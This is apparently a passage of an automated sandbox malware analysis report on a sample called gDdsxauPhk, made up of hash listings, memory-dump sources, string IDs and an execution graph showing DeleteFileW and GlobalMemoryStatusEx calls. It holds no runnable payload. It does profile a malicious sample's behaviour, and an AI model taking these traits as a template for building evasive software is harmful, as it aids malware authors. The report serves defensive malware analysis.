                                                        • Opcode Fuzzy Hash: f9ccc5ee0f743eb0773189a8b35eba863ad92f45426446c7d8a301e8eea92524
                                                        • Instruction Fuzzy Hash: F1F0C2316047009FEB68EB15D54076AB7F9EF44314F50453DD50A8F6A0DF79E886C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8eddb9a76d8320212f3d07c2181021d923c7ac048e88ad9c0ceaaee407cde62
                                                        • Instruction ID: 28331b59423dcc0a5fee6da9ad9fcec4158b5d160d0411ecbd0d45d6e511549e
                                                        • Opcode Fuzzy Hash: d8eddb9a76d8320212f3d07c2181021d923c7ac048e88ad9c0ceaaee407cde62
                                                        • Instruction Fuzzy Hash: D701D638E08248CFDB50DFA5D498AADBBF6BF4A311F149069D429AF356D7359806CF01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9d85d58e070dec55437535d378730a87f2aca9d8f19bb5b840e13705e1d9650
                                                        • Instruction ID: f5ece812d068850fecb266242ccf4b1195bbce50853cb2b51becd1143956f78e
                                                        • Opcode Fuzzy Hash: a9d85d58e070dec55437535d378730a87f2aca9d8f19bb5b840e13705e1d9650
                                                        • Instruction Fuzzy Hash: 10F04F78E09218EFDB80DFA9D5406AEBBB9EB4E300F1091A9D41993344E7709A01CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe31b168a3129268500fb43befefd3cf0fa4da4e461452370b3b77994771d4f7
                                                        • Instruction ID: 377f4b8d8d999ca798342187ea14ed719d6bbc15cc671431ccb7dc9b35e48cfb
                                                        • Opcode Fuzzy Hash: fe31b168a3129268500fb43befefd3cf0fa4da4e461452370b3b77994771d4f7
                                                        • Instruction Fuzzy Hash: 8101C874D002199FCB40DFA8D4855AEBFF5BB08310F1485AAE954E7341D7349A80CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b061ea9444c8a99380a6f56762b81fd60dc693e196004c897be5044a3d7550e3
                                                        • Instruction ID: 395fc035216b46f2847f47e308eea4cddbf1e11a1736b00ca5b5533d3fd47602
                                                        • Opcode Fuzzy Hash: b061ea9444c8a99380a6f56762b81fd60dc693e196004c897be5044a3d7550e3
                                                        • Instruction Fuzzy Hash: FBF0BE307102044FD6A4A738CA84BAA33EAEFC5254F050479C295CF328DE34ED8187D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f1bb1290068a4db462dea5fb67306b794dc7ca234c8e926d2f0b2a641d44f04
                                                        • Instruction ID: 8f459a6d220d7156144449f1022dd091ec28eed8d858955e704d719a79e9be93
                                                        • Opcode Fuzzy Hash: 9f1bb1290068a4db462dea5fb67306b794dc7ca234c8e926d2f0b2a641d44f04
                                                        • Instruction Fuzzy Hash: 50016274E00208EFCB44DFA9D588A9DBFF2AF48310F15C0A9A9489B365DA74EA40CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5601c1fefaa546cf2fd35c8a7139c724d44b76c3bdbab169bbe37e19881cb990
                                                        • Instruction ID: 9dad849b2c4eeb8805e6331ca982be0a41f4fa3e3a47dc6bc953cd3ccb676856
                                                        • Opcode Fuzzy Hash: 5601c1fefaa546cf2fd35c8a7139c724d44b76c3bdbab169bbe37e19881cb990
                                                        • Instruction Fuzzy Hash: 1201F274D08219DFCB84EFA8E9446EEBFF1FB89300F1081AAD859A3250E7755A51CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31b7a555d74afe236b1169bf82282da6d40afd48e456ec9878a1d66ab03ca38e
                                                        • Instruction ID: 45d90eec7d9a0b2f6fcd8e41f404f83d0f7d67d6281cfc1ec374f9cb8ca635eb
                                                        • Opcode Fuzzy Hash: 31b7a555d74afe236b1169bf82282da6d40afd48e456ec9878a1d66ab03ca38e
                                                        • Instruction Fuzzy Hash: 09F0E93391024C9BDF61EFA88C105ED3BA0EF06334F144666E9E5EA111D379D571DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a1f4ad561ae70f8346ee9837a474d56e7a6ac1f5c0948e27e20694335e867c5
                                                        • Instruction ID: 7d28dc4ccda9743b220163e0464fd03166c78b3b0d3dc360d5fe7bf2b129f3a9
                                                        • Opcode Fuzzy Hash: 3a1f4ad561ae70f8346ee9837a474d56e7a6ac1f5c0948e27e20694335e867c5
                                                        • Instruction Fuzzy Hash: B1E092213450515BC354976EA898DEEBFDAEFCA17071540B9E15DC7322CA514C0787A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1db885a69bd0dd6d7604a9d9e13e7324dacf91032ab0026a373d1127cb2cfff6
                                                        • Instruction ID: d4d498eb2cef7487822b8edf9ef253d5367947ce48644427c4a9d2f50dd3017b
                                                        • Opcode Fuzzy Hash: 1db885a69bd0dd6d7604a9d9e13e7324dacf91032ab0026a373d1127cb2cfff6
                                                        • Instruction Fuzzy Hash: 9FF0B7B4D04219DFCB84EFA9D9446AEBBF5FF88300F1081AA9819B7350EB745A40CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43a0d8df753947e859c0ac3d7512094df0fcd82ab67e5bbb05c0e1b8a3ad28f5
                                                        • Instruction ID: 7430379de39266c436b12882c5dcbfe89146b48b0b54cc452625d319ec750506
                                                        • Opcode Fuzzy Hash: 43a0d8df753947e859c0ac3d7512094df0fcd82ab67e5bbb05c0e1b8a3ad28f5
                                                        • Instruction Fuzzy Hash: 52F0653291021DEB5F50EE588C015DD37A4EF0A274F148522F9A5DA150D375EA609BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4289baf324682201c7e856961cdf78efb8e1976d7faba13b58e0688200f697fb
                                                        • Instruction ID: 929a27721697b621e684fd7ba26b0ce256186ab8712d992d90483a4096ba4406
                                                        • Opcode Fuzzy Hash: 4289baf324682201c7e856961cdf78efb8e1976d7faba13b58e0688200f697fb
                                                        • Instruction Fuzzy Hash: B0F08C75E09248EFC780EFA8D4916ACBFF5EB48200F00C0E9986897302D6319A41DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb5e01392831d28cd33e75ba78446dbda809188888cc4f9cdd0dfa23a3c62236
                                                        • Instruction ID: 704621a07a62f7e06168c9d845c73016b24f95cd0ce50c7d9e6c76d0f39410ef
                                                        • Opcode Fuzzy Hash: fb5e01392831d28cd33e75ba78446dbda809188888cc4f9cdd0dfa23a3c62236
                                                        • Instruction Fuzzy Hash: 7EE086313800105B8684B65EA8C887FB6DEEBCA630751447AF20DC7356CE619C054394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91bd1d0dc8c2e40443197b7d396b7fe3cafeec298ee0e4e41727eb3cb1d057c3
                                                        • Instruction ID: 497df406484f2526862672b14bfebb42121f8eacc6473048609daac1307bfa64
                                                        • Opcode Fuzzy Hash: 91bd1d0dc8c2e40443197b7d396b7fe3cafeec298ee0e4e41727eb3cb1d057c3
                                                        • Instruction Fuzzy Hash: 88E0227640A148AFC782EFB898006EA3FB8CB06200F0050E5D1018B111D9328950DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9d3310497deb51124851151ef7c0b03856ac4eb307b92f846f5251355301845
                                                        • Instruction ID: b6d823bdef7c9558f9d90eef3b9f6a153efd3ce3e15a249e8b178e7b6f351131
                                                        • Opcode Fuzzy Hash: a9d3310497deb51124851151ef7c0b03856ac4eb307b92f846f5251355301845
                                                        • Instruction Fuzzy Hash: 5CE0D87194A208DFD740EFA4D50469EBBFADB8A300F1094E696859B150FA324E01EF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58b6418e4e35c2cee5caa20cda2ae94327777037b3ff489626ccd99b2ed5be32
                                                        • Instruction ID: a53af1dfc97d35177728a34e44a14016103bcd6c45a30ea988c2596a1378e1f6
                                                        • Opcode Fuzzy Hash: 58b6418e4e35c2cee5caa20cda2ae94327777037b3ff489626ccd99b2ed5be32
                                                        • Instruction Fuzzy Hash: 43E0D87890D249EFCB40DFA8E850AFDBFB4EB46304F1491D9D8941B341CA326953DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70d56a973ea95afce46e84f61be8acb626a0ffd8791fd46ba6d16ed6560bb2bc
                                                        • Instruction ID: f9e63a6ebe47c49464a72d492ae79a54e0fef77046f1f66b94ef4be2f023abca
                                                        • Opcode Fuzzy Hash: 70d56a973ea95afce46e84f61be8acb626a0ffd8791fd46ba6d16ed6560bb2bc
                                                        • Instruction Fuzzy Hash: 10E06D34A0A205CFDB94EB55C9905ACB7BABF88300F009868C81AAB265CB305945CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffd3df46e28ee7dfd46b2bae31b09bf0d84aa528ae4f8c2fbde21a98556d7e33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$[V~*$]\`
                                                        • API String ID: 0-1849991408
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$B$B$Hbq
                                                        • API String ID: 0-1093311442
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$$^q$$^q$$^q
                                                        • API String ID: 0-314989797
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$B$B
                                                        • API String ID: 0-685577651
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:12.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:27
                                                        Total number of Limit Nodes:6
                                                        execution_graph 24125 1408170 24126 14081b6 DeleteFileW 24125->24126 24128 14081ef 24126->24128 24129 1400848 24130 140084e 24129->24130 24131 140091b 24130->24131 24134 14014b7 24130->24134 24140 140138f 24130->24140 24136 14013a6 24134->24136 24137 14014bb 24134->24137 24135 14014b4 24135->24130 24136->24135 24139 14014b7 2 API calls 24136->24139 24145 1408348 24136->24145 24137->24130 24139->24136 24141 1401383 24140->24141 24142 1401393 24140->24142 24141->24130 24142->24141 24143 14014b7 2 API calls 24142->24143 24144 1408348 2 API calls 24142->24144 24143->24142 24144->24142 24146 1408352 24145->24146 24147 140836c 24146->24147 24150 6b4f9f7 24146->24150 24154 6b4fa08 24146->24154 24147->24136 24151 6b4fa1d 24150->24151 24152 6b4fc2e 24151->24152 24153 6b4fc49 GlobalMemoryStatusEx GlobalMemoryStatusEx 24151->24153 24152->24147 24153->24151 24155 6b4fa1d 24154->24155 24156 6b4fc2e 24155->24156 24157 6b4fc49 GlobalMemoryStatusEx GlobalMemoryStatusEx 24155->24157 24156->24147 24157->24155

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: ee90073d7f717a9020c8a5b57164c4f3e34871b2e6f7974525ff7d7c7f062c3e
                                                        • Instruction ID: c47e098b665d3193e19cb3cbac365a251dba615cf135a973a1546dacd8196e10
                                                        • Opcode Fuzzy Hash: ee90073d7f717a9020c8a5b57164c4f3e34871b2e6f7974525ff7d7c7f062c3e
                                                        • Instruction Fuzzy Hash: 97321D31E1065A8FCB54EF79C89459DB7F2FF89300F1486A9D409AB264EF34AD85CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: c2ee7ffb60930d58eb217538b08a5f05a99ef474202b5b74c843d6c802616e09
                                                        • Instruction ID: c48d5c2d8be68c8fe9311bd1ff86b25c1d8243bf00bd7ddd017b9c5b1ddbf114
                                                        • Opcode Fuzzy Hash: c2ee7ffb60930d58eb217538b08a5f05a99ef474202b5b74c843d6c802616e09
                                                        • Instruction Fuzzy Hash: F3029D70B102159FDB54EF68D5906AEB7E2FF84304F1485A9E406AB394DF35EC46CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 1131d4cf680370c4ab628a8b354033c8dc894837ffa60da7c73cb0dd8c295f15
                                                        • Instruction ID: d51dd186cf08f36d7ffd1aa0d7d33813974bca756f435933df7c49260eedbe32
                                                        • Opcode Fuzzy Hash: 1131d4cf680370c4ab628a8b354033c8dc894837ffa60da7c73cb0dd8c295f15
                                                        • Instruction Fuzzy Hash: BF22C1B2E006199FDF64EFA8C4806AEB7B2FF85310F2084A9D419AB344DB35DD45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07a4fd8173a96d7d0e24439904e150c1fa52b542f24148d3a78f31290d9d8c19
                                                        • Instruction ID: 7a95448407f350a64b99804e020a3e9e4ca5de35ecbe86b9e3751a607a9efed7
                                                        • Opcode Fuzzy Hash: 07a4fd8173a96d7d0e24439904e150c1fa52b542f24148d3a78f31290d9d8c19
                                                        • Instruction Fuzzy Hash: 2662C070B002059FDB54EB68D584BADB7F2EF89314F1494A9E406EB391EB35EC46DB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f72d9cfe02dfc655f04e5b79fcdcb0daa6334d9b01f5400a7c09c8a87f38b67
                                                        • Instruction ID: ada8bd55e2bb0dbd8b31ff71368550c2862455e88cd8a86e6f851a61b6e23652
                                                        • Opcode Fuzzy Hash: 9f72d9cfe02dfc655f04e5b79fcdcb0daa6334d9b01f5400a7c09c8a87f38b67
                                                        • Instruction Fuzzy Hash: FF2293B0E101099FDF64EB6CD4807ADB7B6FB89310F209965E509EB391CA39DC81DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3823777903
                                                        • Opcode ID: af8a183296e51d18f86370325629218f94929b07d74c5c555f29249544290a45
                                                        • Instruction ID: 3240a8bdc0b14aea2fa9f485e8ba9d4c912aecee574c840669e9abadfdd96530
                                                        • Opcode Fuzzy Hash: af8a183296e51d18f86370325629218f94929b07d74c5c555f29249544290a45
                                                        • Instruction Fuzzy Hash: A4E18F70F5021A8FDB69EF69D5846AEB7B2FF84304F208569D409AB358DB34DC46CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 4d9ae1ddebadaa230f203323ba4ed4d787e5840195239c28feb0a05e1ef176fc
                                                        • Instruction ID: d20e12f9624e66ddd406cdb13c00b2a7de057358522e17e0f575cdbe4a1207e5
                                                        • Opcode Fuzzy Hash: 4d9ae1ddebadaa230f203323ba4ed4d787e5840195239c28feb0a05e1ef176fc
                                                        • Instruction Fuzzy Hash: E802AFB0E1020A9FDF64EF68C5806ADB7B2FB84304F1085AAE505DB355DB35EC86DB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 3dfa6291f6482f9df8f8c7d3e124dfa8b23dfced40fd28bcd8d223f077c151b7
                                                        • Instruction ID: 0878ef74a94dbc383fd1ea31c7cf10bd81979d05fbdceda740195796c1d92735
                                                        • Opcode Fuzzy Hash: 3dfa6291f6482f9df8f8c7d3e124dfa8b23dfced40fd28bcd8d223f077c151b7
                                                        • Instruction Fuzzy Hash: 02913C70B0021A9FDB54EF65D8507AFB3F6FF89240F1085A9D809EB384EE749D468B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q
                                                        • API String ID: 0-831282457
                                                        • Opcode ID: dbbaeb8646a9e64a6aa8517fe3671ad1f74d14f97f264a5480c7fb8bdf4cce7d
                                                        • Instruction ID: 9cdfc6c66df8effd166cd4c27c1053629cf70905050f684af606fa70b8edbe6e
                                                        • Opcode Fuzzy Hash: dbbaeb8646a9e64a6aa8517fe3671ad1f74d14f97f264a5480c7fb8bdf4cce7d
                                                        • Instruction Fuzzy Hash: 16624070A0021A9FCB55EF68D590A5DBBF2FF84304B108A79D0099F365DB75ED8ACB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fcq$XPcq$\Ocq
                                                        • API String ID: 0-3575482020
                                                        • Opcode ID: b52a56f214448543f5cb2b821742127a979ccdf9ecbc8ae67f5adaa05ba3f2c0
                                                        • Instruction ID: 6f29fc0f00e69c8df09f61aa42f797639acccc39113e3f7178e1a13e7c78a866
                                                        • Opcode Fuzzy Hash: b52a56f214448543f5cb2b821742127a979ccdf9ecbc8ae67f5adaa05ba3f2c0
                                                        • Instruction Fuzzy Hash: E7618170F002199FEB54DFA8C8547AEBBF6FB88700F20852AE106AB395DF754C459B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: 4e7a67487b328d6daec23d94d2e06fef5fcfae40c73c34440166137bcb4aa038
                                                        • Instruction ID: 71d7e9c8f570821634d63c272beb2bfd9032b48eb7ef6e480ce4939da2ec4aed
                                                        • Opcode Fuzzy Hash: 4e7a67487b328d6daec23d94d2e06fef5fcfae40c73c34440166137bcb4aa038
                                                        • Instruction Fuzzy Hash: BA517E70B00216AFDB54EB74D850B6FB7FAEBC8644F108569D809EB384DE34DC428B95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1455 1408168-14081ba 1458 14081c2-14081ed DeleteFileW 1455->1458 1459 14081bc-14081bf 1455->1459 1460 14081f6-140821e 1458->1460 1461 14081ef-14081f5 1458->1461 1459->1458 1461->1460
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 014081E0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
